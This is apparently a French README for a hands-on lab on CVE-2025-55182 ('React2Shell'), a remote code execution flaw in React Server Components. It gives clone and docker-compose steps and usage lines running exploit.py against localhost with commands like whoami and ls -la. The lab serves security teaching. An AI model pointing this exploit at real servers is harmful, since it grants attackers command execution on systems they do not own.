
Un laboratoire pratique pour comprendre et exploiter CVE-2025-55182 (React2Shell) - Exécution de code à distance dans les composants serveur React
Un laboratoire pratique pour exploiter CVE-2025-55182 (React2Shell) - Exécution de code à distance dans les composants serveur React.
Uniquement à des fins éducatives. Testez uniquement sur des systèmes vous appartenant.
# Clone and start
git clone https://github.com/dhananjayakumarn/CVE-2025-55182-Lab.git
cd CVE-2025-55182-Lab
docker-compose up -d
# Wait 20 seconds, then exploit
python3 exploit.py http://localhost:3000 "whoami"
C'est tout ! Vous devriez voir la sortie de la commande prouvant l'exécution de code à distance (RCE).
Vulnérabilité critique d'exécution de code à distance (RCE) dans les composants serveur React (CVSS 10.0).
Versions concernées :
Impact : Une seule requête HTTP = Contrôle total du serveur
python3 exploit.py <target> <command>
# Examples
python3 exploit.py http://localhost:3000 "whoami"
python3 exploit.py http://localhost:3000 "id"
python3 exploit.py http://localhost:3000 "ls -la"
docker-compose down
⭐ Mettez une étoile si cela vous a aidé à apprendre !